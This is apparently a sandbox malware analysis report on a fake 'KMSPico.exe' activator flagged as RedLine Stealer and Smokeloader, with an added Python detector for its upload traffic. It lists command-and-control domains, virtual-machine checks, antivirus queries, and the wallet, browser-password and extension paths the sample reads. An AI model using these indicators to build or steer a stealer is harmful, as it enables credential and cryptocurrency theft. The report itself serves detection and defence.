Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49711 version: TLS 1.2
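The eight POST /api requests in this section show the shape of the exfiltration rather than its content: two small application/x-www-form-urlencoded bodies (8 and 52 bytes) to technologyenterdo.shop, then six multipart/form-data uploads that all reuse the boundary be85de5ipdocierre1 and add up to 650,719 bytes. Note that the Malpedia description above quotes a "TeslaBrowser/5.5" user agent, while this sample sends a Chrome 119 user agent (the "Uses a known web browser user agent" signature), so a detection keyed to the user-agent string alone would miss it. The following is an added example, not part of the report and not Joe Sandbox code: it parses request heads constructed from the header values listed above and flags a host/path pair that receives a beacon-sized form POST followed by multipart uploads sharing one fixed boundary. The 64-byte beacon threshold and the two www.example.com requests are assumptions for the demo; the request bodies were not captured and are not reproduced.

```python
"""Recognise the check-in-then-upload shape of the POST /api traffic in the
report. Added example: request heads are constructed from the header values
the report lists; no bodies were captured, so none are reproduced."""
from collections import defaultdict

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
FORM = "application/x-www-form-urlencoded"
MULTIPART = "multipart/form-data; boundary=be85de5ipdocierre1"
C2_HOST = "technologyenterdo.shop"


def request_head(host, path, ctype, length):
    """Build a raw HTTP/1.1 request head (headers only) like those in the report."""
    return (f"POST {path} HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"Content-Type: {ctype}\r\nUser-Agent: {UA}\r\n"
            f"Content-Length: {length}\r\nHost: {host}\r\n\r\n")


# Constructed capture: the first eight entries use the Content-Type/Content-Length
# pairs from the report in the order listed; the last two are benign filler
# (assumed, not from the report) to show what is not flagged.
CAPTURE = [request_head(C2_HOST, "/api", FORM, 8),
           request_head(C2_HOST, "/api", FORM, 52)]
CAPTURE += [request_head(C2_HOST, "/api", MULTIPART, n)
            for n in (13678, 16221, 20565, 7086, 1256, 591913)]
CAPTURE += [request_head("www.example.com", "/upload",
                         "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk", 4096),
            request_head("www.example.com", "/login", FORM, 40)]


def parse_head(raw):
    """Split a request head into (method, path, {lower-case header name: value})."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            break                       # blank line terminates the head
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def boundary_of(ctype):
    """Return the boundary parameter of a multipart Content-Type, or None."""
    for param in ctype.split(";")[1:]:
        key, _, value = param.strip().partition("=")
        if key.lower() == "boundary":
            return value.strip('"')
    return None


def summarise(capture, beacon_max=64):
    """Group POSTs by (host, path): beacon-sized form bodies, multipart uploads,
    bytes uploaded, the set of multipart boundaries and whether a browser UA was used."""
    stats = defaultdict(lambda: {"beacons": 0, "uploads": 0, "upload_bytes": 0,
                                 "boundaries": set(), "browser_ua": False})
    for raw in capture:
        method, path, h = parse_head(raw)
        if method != "POST":
            continue
        s = stats[(h.get("host", "?"), path)]
        ctype = h.get("content-type", "")
        length = int(h.get("content-length", "0") or 0)
        if "chrome/" in h.get("user-agent", "").lower():
            s["browser_ua"] = True
        if ctype.lower().startswith(FORM) and length <= beacon_max:
            s["beacons"] += 1
        elif ctype.lower().startswith("multipart/form-data"):
            s["uploads"] += 1
            s["upload_bytes"] += length
            b = boundary_of(ctype)
            if b:
                s["boundaries"].add(b)
    return dict(stats)


def suspicious_endpoints(stats):
    """(host, path) pairs with at least one beacon-sized form POST plus multipart
    uploads that all reuse a single boundary: browsers generate a random boundary
    per request, a hand-rolled client like this one reuses the same string."""
    return [key for key, s in stats.items()
            if s["beacons"] >= 1 and s["uploads"] >= 1 and len(s["boundaries"]) == 1]


if __name__ == "__main__":
    stats = summarise(CAPTURE)
    for host, path in suspicious_endpoints(stats):
        s = stats[(host, path)]
        print(f"{host}{path}: {s['beacons']} beacon(s), {s['uploads']} upload(s), "
              f"{s['upload_bytes']} bytes, boundary={s['boundaries']}, "
              f"browser UA={s['browser_ua']}")
```

Run against a proxy or sandbox capture this pairs naturally with the C2 list: a host that is already in the configuration is flagged by name, and a new domain that shows the same request shape is surfaced before a rule exists for it.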

System Summary

Source: 00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\KMSPico.exe | Code function: 0_3_04B14C30
Source: C:\Users\user\Desktop\KMSPico.exe | Code function: 0_3_04B14C21
Source: C:\Users\user\Desktop\KMSPico.exe | Code function: 0_3_04B14E68
Source: C:\Users\user\Desktop\KMSPico.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\KMSPico.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: KMSPico.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: KMSPico.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@2/1
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\69d65d6d-4339-42fb-b020-3566e279c540Jump to behavior
            Source: KMSPico.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\KMSPico.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: KMSPico.exe, 00000000.00000003.2035819384.0000000004B24000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2046237881.0000000004B28000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2046349113.0000000004B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: KMSPico.exeReversingLabs: Detection: 36%
            Source: KMSPico.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\KMSPico.exeFile read: C:\Users\user\Desktop\KMSPico.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\KMSPico.exe C:\Users\user\Desktop\KMSPico.exe
            Source: C:\Users\user\Desktop\KMSPico.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            Source: C:\Users\user\Desktop\KMSPico.exe | Unpacked PE file: 0.2.KMSPico.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\Desktop\KMSPico.exe | Unpacked PE file: 0.2.KMSPico.exe.400000.0.unpack
            Source: KMSPico.exe | Static PE information: section name: .text entropy: 7.7446509642308685
            Source: C:\Users\user\Desktop\KMSPico.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\KMSPico.exe | System information queried: FirmwareTableInformation
            Source: C:\Users\user\Desktop\KMSPico.exe TID: 3144 | Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\Desktop\KMSPico.exe TID: 2828 | Thread sleep time: -30000s >= -30000s
            Source: Amcache.hve.4.dr | Binary or memory string: VMware
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B4E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
            Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259052539.0000000002559000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259067959.0000000002593000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B4E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
            Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
            Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
            Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
            Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259067959.0000000002593000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW[ {
            Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Amcache.hve.4.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: KMSPico.exe, 00000000.00000003.2046453426.0000000004B49000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: C:\Users\user\Desktop\KMSPico.exe | Process information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: associationokeo.shop
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: turkeyunlikelyofw.shop
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: pooreveningfuseor.pw
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: edurestunningcrackyow.fun
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: detectordiscusser.shop
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: problemregardybuiwo.fun
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: lighterepisodeheighte.fun
            Source: KMSPico.exe, 00000000.00000003.2018435849.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: technologyenterdo.shop
            Source: C:\Users\user\Desktop\KMSPico.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\KMSPico.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
            Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: KMSPico.exe, 00000000.00000002.2259067959.0000000002565000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121121404.0000000002606000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259320177.0000000002607000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002560000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2101896960.0000000004B05000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\KMSPico.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: KMSPico.exe PID: 3648, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
            Source: KMSPico.exe, 00000000.00000002.2257432967.0000000000196000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: -A%appdata%\Electrum\wallets\
            Source: KMSPico.exe, 00000000.00000002.2259067959.0000000002565000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Edge/Default/Extensions/Jaxx Libertyj
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
            Source: KMSPico.exe, 00000000.00000002.2259067959.0000000002565000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Chrome/Default/Extensions/ExodusWeb3
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "p": "%appdata%\\Ethereum",
            Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsY[
            Source: KMSPico.exe, 00000000.00000003.2034843504.00000000025EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "keystore"
            Source: KMSPico.exe, 00000000.00000003.2034903140.000000000256C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live/>
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
